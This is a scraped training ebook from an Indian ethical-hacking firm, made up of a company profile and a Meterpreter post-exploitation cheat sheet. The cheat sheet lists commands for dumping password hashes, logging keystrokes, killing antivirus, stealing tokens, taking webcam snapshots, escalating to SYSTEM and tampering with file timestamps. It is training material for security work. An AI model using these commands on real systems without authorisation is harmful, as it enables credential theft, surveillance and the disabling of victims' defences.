seculabs ebook - meterpreter cheatsheet commands
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 1/15
SECUGENIUS SECURITY SOLUTIONS
--------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile:
Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student
Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS
are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius
Security Solutions are providing training in Information Security and various professional courses.
Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters.
Looking at the number of Cyber Crimes over the last many years, we at Secugenius Security
Solutions provide training on Ethical hacking & Cyber Security to students, IT Professionals, Bank
Employees, Police officials.
Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the
benefit of the students & making them aware of the latest trends in technological era of the
Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the
nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime
Investigation & Forensic Sciences.
Secugenius provides various security solutions to its clients by securing their websites from cyber
attacks. We provide training to college students, graduates and professionals in various fields.
Education is delivered to students through two modes i.e. Regular mode and Distance mode which
are available as short term and long term courses.
In the workshops conducted by Secugenius, participants can claim to be trained by the highly
experienced & skilled corporate trainers from different parts of the nation. We believe in making
the base of students to be as strong as possible. All the modules have been designed in order to
provide students with specialized knowledge by specialized trainers.
This library was furnished, managed and funded by the Founders and Directors of Secugenius
Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of
the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security
Solutions.
This Online Digital Library has been initiated as a free resource & permanent
resource on specialization basis for every student of Team Secugenius.
Meterpreter Cheat sheet Commands
Product ID No: SG/ODL/13049
Founder & Director: Harpreet Khattar & Kshitij Adhlakha
Resource Person: Chetan Soni & Annuraj
Secugenius Security Solutions
SCO-13A, Model Town Extn, Near Krishna Mandir,
Ludhiana-141002, Punjab – India
www.secugenius.com , www.seculabs.in
Meterpreter –
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter was originally written by skape for Metasploit 2.x; a common extension was merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3.
The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable. The client can be written in any language but Metasploit has a full-featured Ruby client API.
How Meterpreter Works
i. The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.
ii. The stager loads the DLL prefixed with Reflective. The Reflective stub handles the
loading/injection of the DLL.
iii. The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET.
Metasploit receives this GET and configures the client.
iv. Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module
gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV
protocol. (Reference - http://www.offensive-security.com)
Since Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help you get familiar with this most powerful tool.
Throughout this EBook, almost every available Meterpreter command is covered.
For those that aren't covered, experimentation is the key to successful learning.
sysinfo
It shows system information such as the architecture (x86 or x64), language version, build, etc.
run checkvm
It checks to see if the victim is running in a virtual machine or on native hardware.
route
Dumps the routing table to the screen and shows how the subnet has been configured, etc.
run get_application_list
This shows you the applications installed on the remote PC.
idletime
It shows how long the victim has not been active on the computer.
getpid
This gets the process ID and shows the process you are currently running in.
getuid
This will show you the system identity and who you are running as, such as system.
ps
This shows all the processes running on the victim as well as their PIDs.
getsystem
This gives you local system privileges.
run get_env
This will give you a lot of info on the system.
execute -f cmd.exe -H -c
Open a command prompt on a hidden channel.
interact 1
Interact with a channel. "1" will be replaced with the channel you want to interact with.
download
This command will download the specified file.
Example: download c:\\boot.ini
upload
Upload files to the victim machine.
portfwd
This command forwards a local port to a remote service.
run getgui -e
This will enable remote desktop on the victim.
run getcountermeasure
It checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc.
run killav
It is designed to kill most AVs that are running as a service on the exploited machine.
run get_local_subnets
It is used to get the local subnet of the victim machine.
run remotewinenum
It is designed to enumerate the target system with the wmic command.
load
Load One or More Meterpreter Extensions.
channel
Displays Info about Active Channels.
keyscan_start
Start Capturing Keystrokes
getdesktop
setdesktop
Change the Meterpreter's Current Desktop.
reboot
Reboots the Remote Computer.
getprivs
Attempt to Enable All Privileges Available to the Current Pro
reg
Interact with the Remote Registry
shell
Drop into a system shell.
shutdown
Shuts Down the Remote Computer
steal_token
Attempt to Steal an Impersonation Token from the Process
execute
Execute a command.
info
Display info about active post module.
hashdump
Dumps the content of the SAM Database.
timestomp
Manipulates MACE Attributes
quit
Terminate the meterpreter session.
getwd
Print Working Directory
webcam_list
List webcams.
webcam_snap
Take a snapshot from the specified webcam.
(Photo of Mr. Annuraj)
mkdir
Make directory.
pwd
Print working directory.
drop_token
Relinquishes Any Active Impersonation Token
rmdir
Remove directory.
del
Delete file.
Example: del passwords.txt